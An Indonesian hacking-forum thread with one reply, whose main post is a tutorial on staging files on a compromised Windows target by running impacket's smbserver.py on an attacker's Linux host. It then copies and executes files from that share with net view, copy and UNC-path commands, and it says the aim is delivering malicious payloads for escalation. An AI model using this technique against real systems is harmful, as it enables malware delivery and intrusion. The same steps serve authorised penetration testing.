[Share] Windows {Transfer|Execute} File via SMB
#1
Star 
Sedikit tips transfer file / execute file dari Linux ke Windows target. Cara ini biasa dilakukan apabila kita sudah mendapatkan akses ke dalam mesin windows target, lalu ingin mengirim payload / file-file jahat lainnya dengan tujuan eskalasi sistem atau yg lainnya.
Nah disini kita bisa melakukannya via SMB. Bagi kalian yang belum mengetahui apa itu smb, mungkin bisa baca-baca dulu disini. Simplenya SMB adalah sebuah protokol file sharing dimana dalam melakukan pertukaran data nya ada yg bertugas sebagai server & dan tentunya ada klien. Dan protokol SMB ini sering banget digunakan dalam sistem operasi Windows, tapi di Linux juga ada.
Oke langsung aja, karna dalam protokol SMB harus ada yang jadi server dan klien.. pada case kali ini tentunya yang bertindak sebagai server adalah Linux lokal kita — lalu klien nya adalah mesin Windows target.
Pertama-tama download script smbserver.py dari impacket. Bagi yang belum download, bisa dicek pada github CoreSecurity disini.

Kemudian jalankan scriptnya seperti berikut ini:
Code:
# python smbserver.py IPIN /root/SMB/

[Image: 1*8qAf5NY0kZgyrrZSsQA3BA.png]

penjelasan singkat nya, IPIN adalah nama sharing SMB yang dibuat dan /root/SMB adalah path folder yang nantinya kita sharing pada SMB tersebut.

Setelah smbserver kita berjalan, kita bisa langsung check pada mesin Windows target kita apakah smbserver yang kita jalankan pada Linux sudah berjalan.

Gunakan command net view \\IP pada cmd Windows

[Image: 1*7NqfFwZvlOVd1TFtK9r53g.png]

Nah disitu sudah terlihat bahwa Linux kita sudah berhasil menjalankan SMB Server dengan nama share nya IPIN.

Saya sudah meletakan 1 buah file tes.txt pada direktori /root/SMB (direktori file sharing) yang nanti nya akan kita coba transfer ke Windows target.

[Image: 1*0kQuIfsIMYP2D91H0h-o_g.png]

Percobaan pertama, kita akan transfer file tes.txt tersebut. Gunakan command copy pada cmd seperti berikut:
Code:
windows> copy \\IP\namafile .
[Image: 1*vsRCcJyjRypCmkcf9FnWnQ.png]

penjelasannya adalah, copy adalah perintah pada cmd windows dan \\IP dari Linux kita \namafile adalah nama file yang ingin kita transfer (pastikan sesuai namanya) lalu ‘. (titik) disini adalah path direktori mana yang akan menerima hasil copy nya. Kalau kita kasih titik berarti kita copy pada direktori yg sama dengan direktori yang lagi aktif.

Ketika dilihat isi hasil transfer file tes.txt tentunya juga akan sama

[Image: 1*ccvlUy77d9iWjWavMYfddA.png]

Selanjutnya kita coba execute / jalankan sebuah file via SMB. Jadi disini saya sudah menyiapkan sebuah file .exe yaitu whoami.exe (untuk mengecek whoami pada os windows) pada direktori /root/SMB.

[Image: 1*sjaDDk9zmtuhdfov2weXXw.png]

Kemudian kita cek terlebih dahulu lewat windows target mesin apakah whoami.exe terdapat pada file share SMBServer kita.

Gunakan perintah dir \\IP\ShareName

[Image: 1*y0Z8fnnqnyX8MfwBxZcm0w.png]

Dan kita lihat sudah terdapat file whoami.exe pada SMB share kita. Langsung saja execute / jalankan file tersebut.

Gunakan perintah \\IP\ShareName\FileName

[Image: 1*nh8nmpBoDRPSR0x6ZfdwAw.png]

Violaaa~
Mungkin segitu dulu tips kali ini Big Grin
Kalau ada yang ingin ditanyakan silahkeun..
"pertarungan terbaik adalah menghindarinya"
--KURAWA--




#2
wah IPIN SMB hahaha

thanks sharingnya om Big Grin
Jangan Makan Tulang Kawan | Kurawa |





Users browsing this thread: 1 Guest(s)